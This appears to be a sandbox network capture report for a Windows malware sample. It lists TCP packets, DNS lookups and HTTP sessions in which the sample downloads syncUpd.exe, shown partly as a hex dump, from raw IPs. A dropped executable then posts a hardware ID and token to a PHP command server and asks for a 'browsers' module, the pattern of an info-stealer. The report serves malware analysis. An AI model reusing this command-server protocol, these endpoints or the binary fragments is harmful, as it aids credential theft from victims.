Apr 26, 2024 23:09:04.180205107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180239916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180244923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180300951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180324078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180345058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180521965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180565119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180600882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180696964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180732012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180742025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180819988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.180859089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.180880070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.181111097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.181148052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.181519985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182130098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182168007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.182223082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182312965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182352066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.182374954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182554007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182593107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.182614088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182720900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182755947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.182770967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.182979107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.183013916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.185568094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.185769081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.185828924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.185910940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.186508894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.186769962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188316107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188493013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188644886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188733101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188775063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.188930035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189328909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189397097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189455032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189496040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189534903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189614058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.189730883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.190511942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.190556049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.190606117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.190701962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193466902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193505049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.193546057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193625927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193659067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.193711996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193833113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193871975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.193893909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.193963051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194001913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194053888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194139004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194175959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194205046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194273949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194310904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194336891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194406033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194437027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194462061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194574118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194614887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194637060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194689989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194731951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194751024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194825888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194860935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.194938898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.194987059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195022106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.195045948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195111990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195148945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.195185900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195297956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195332050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.195378065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195477962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.195518017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.195939064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196007967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196044922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.196110964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196197987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196239948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.196338892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196350098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196386099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.196691036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196744919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196780920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.196815968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196862936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.196902037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.196980953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197036982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197074890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.197109938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197190046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197225094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.197258949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197324038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197360039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.197385073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197438955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197480917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.197504997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197597980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:04.197634935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:04.197674036 CEST	80	49734	176.97.76.106	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 23:08:57.089993954 CEST	192.168.2.4	1.1.1.1	0x54e	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:08:59.581481934 CEST	192.168.2.4	1.1.1.1	0x54e	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:09:13.143759966 CEST	192.168.2.4	1.1.1.1	0x4dff	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:09:27.271101952 CEST	192.168.2.4	1.1.1.1	0xf818	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:10:04.849829912 CEST	192.168.2.4	1.1.1.1	0x51f5	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 23:08:58.349827051 CEST	1.1.1.1	192.168.2.4	0x54e	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:08:59.706862926 CEST	1.1.1.1	192.168.2.4	0x54e	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:09:12.988559008 CEST	1.1.1.1	192.168.2.4	0x539a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 23:09:12.988559008 CEST	1.1.1.1	192.168.2.4	0x539a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:09:13.286863089 CEST	1.1.1.1	192.168.2.4	0x4dff	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:09:27.400331020 CEST	1.1.1.1	192.168.2.4	0xf818	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 23:09:27.400331020 CEST	1.1.1.1	192.168.2.4	0xf818	No error (0)	iolo0.b-cdn.net		195.181.163.193	A (IP address)	IN (0x0001)	false
Apr 26, 2024 23:10:04.976326942 CEST	1.1.1.1	192.168.2.4	0x51f5	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 23:10:04.976326942 CEST	1.1.1.1	192.168.2.4	0x51f5	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 23:10:04.976326942 CEST	1.1.1.1	192.168.2.4	0x51f5	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	7004	C:\Users\user\Desktop\wxfSIz4PAi.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:08:52.240582943 CEST	204	OUT	GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 23:08:53.904736996 CEST	148	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:08:52 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	7004	C:\Users\user\Desktop\wxfSIz4PAi.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:08:54.854088068 CEST	190	OUT	GET /ping.php?substr=two HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 23:08:55.095015049 CEST	147	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:08:54 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	7004	C:\Users\user\Desktop\wxfSIz4PAi.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:08:55.363866091 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 23:08:55.604291916 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:08:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 21:00:01 GMT ETag: "4c400-617062ff083e7" Accept-Ranges: bytes Content-Length: 312320 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 26 85 3e 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 82 c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 c3 03 00 04 00 00 5d 0c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PEL&>e@0@](@iL28@0.text `.rdatam0n@@.data@.rsrci@jD@@.relocL@B [TRUNCATED]
Apr 26, 2024 23:08:55.604312897 CEST	1289	IN	Data Raw: 41 00 e8 ef 27 00 00 59 c3 b9 bc 21 02 04 e8 c8 02 00 00 68 8f 28 41 00 e8 d9 27 00 00 59 c3 b9 a8 21 02 04 e8 1f 03 00 00 68 85 28 41 00 e8 c3 27 00 00 59 c3 6a 00 b9 b0 21 02 04 e8 15 01 00 00 c3 6a 00 b9 a4 21 02 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: A'Y!h(A'Y!h(A'Yj!j!j!j!UQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
Apr 26, 2024 23:08:55.604330063 CEST	1289	IN	Data Raw: 00 53 53 ff 15 34 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 30 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a4 30 41 00 53 53 ff 15 a0 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 5c 30 41 00 8b 45 f8 8b 0d 98 Data Ascii: SS40AEP0ASSS00APS0ASS0AEPSEPSH0ASSSS\0AE!+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5!W=t
Apr 26, 2024 23:08:55.604347944 CEST	1289	IN	Data Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45 Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
Apr 26, 2024 23:08:55.604408026 CEST	1289	IN	Data Raw: 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 5c 89 41 00 e8 c0 03 00 00 cc 68 Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]h\AhlAU]faayrUQEPN3B;HF]`(AgSVuWe};su'3EOu;vW+
Apr 26, 2024 23:08:55.604506016 CEST	1289	IN	Data Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
Apr 26, 2024 23:08:55.604651928 CEST	1289	IN	Data Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAA1 AAUEu#h#3]@]U
Apr 26, 2024 23:08:55.604732990 CEST	1289	IN	Data Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40 Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$40@$/@Ir+$8/@$
Apr 26, 2024 23:08:55.604773045 CEST	1289	IN	Data Raw: 00 00 59 e8 a1 1a 00 00 c7 00 0c 00 00 00 33 c0 5e 5d c3 cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 Data Ascii: Y3^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W\|$n$L$Wtt=u~3tAt#
Apr 26, 2024 23:08:55.604845047 CEST	1289	IN	Data Raw: 00 e8 2b 15 00 00 33 c0 eb 7e 33 c0 8b 5d 0c 85 db 0f 95 c0 85 c0 74 de 33 c0 38 03 0f 95 c0 85 c0 74 d3 e8 ac 3a 00 00 8b f0 89 75 08 85 f6 75 0d e8 6a 15 00 00 c7 00 18 00 00 00 eb c8 83 65 fc 00 80 3f 00 75 20 e8 54 15 00 00 c7 00 16 00 00 00 Data Ascii: +3~3]t38t:uuje?u TjEPh8A>VuSW;}E)u}VJYUj@uu,]jhAN)3]3}uQ39Et
Apr 26, 2024 23:08:55.845791101 CEST	1289	IN	Data Raw: 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 54 30 41 00 85 c0 75 19 ff 15 58 30 41 00 50 e8 55 10 00 00 ff 36 e8 c3 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3 55 8b ec 51 8d 45 fc 50 68 b0 40 41 00 6a 00 ff 15 b8 30 41 00 85 c0 74 17 68 c8 Data Ascii: uPjujST0AuX0APU6&Y3@^[]UQEPh@Aj0Ath@Auh0Atu]UuYu0AUuEYhjjjMjjj>U=@Ath@AqSYtu@AYNTh1Ah1A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.172.128.76	80	3484	C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:08:57.572292089 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--
Apr 26, 2024 23:08:58.134627104 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:08:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 44 49 7a 4e 57 59 77 4e 57 4a 6d 5a 47 52 6c 4f 47 5a 68 4d 32 5a 68 4d 32 56 6c 5a 6a 42 6b 5a 6a 68 6a 59 54 6b 30 4e 6a 64 69 5a 6d 46 6c 4d 7a 45 32 4d 57 49 30 5a 57 46 6b 4d 7a 4a 6a 4d 54 49 30 5a 6a 64 6a 4d 6a 59 33 4e 47 59 79 4e 6d 55 31 5a 54 59 7a 4f 54 51 79 5a 57 4e 69 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MDIzNWYwNWJmZGRlOGZhM2ZhM2VlZjBkZjhjYTk0NjdiZmFlMzE2MWI0ZWFkMzJjMTI0ZjdjMjY3NGYyNmU1ZTYzOTQyZWNifGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 26, 2024 23:08:59.654524088 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"browsers------HJDBFBKKJDHJKECBGDAK--
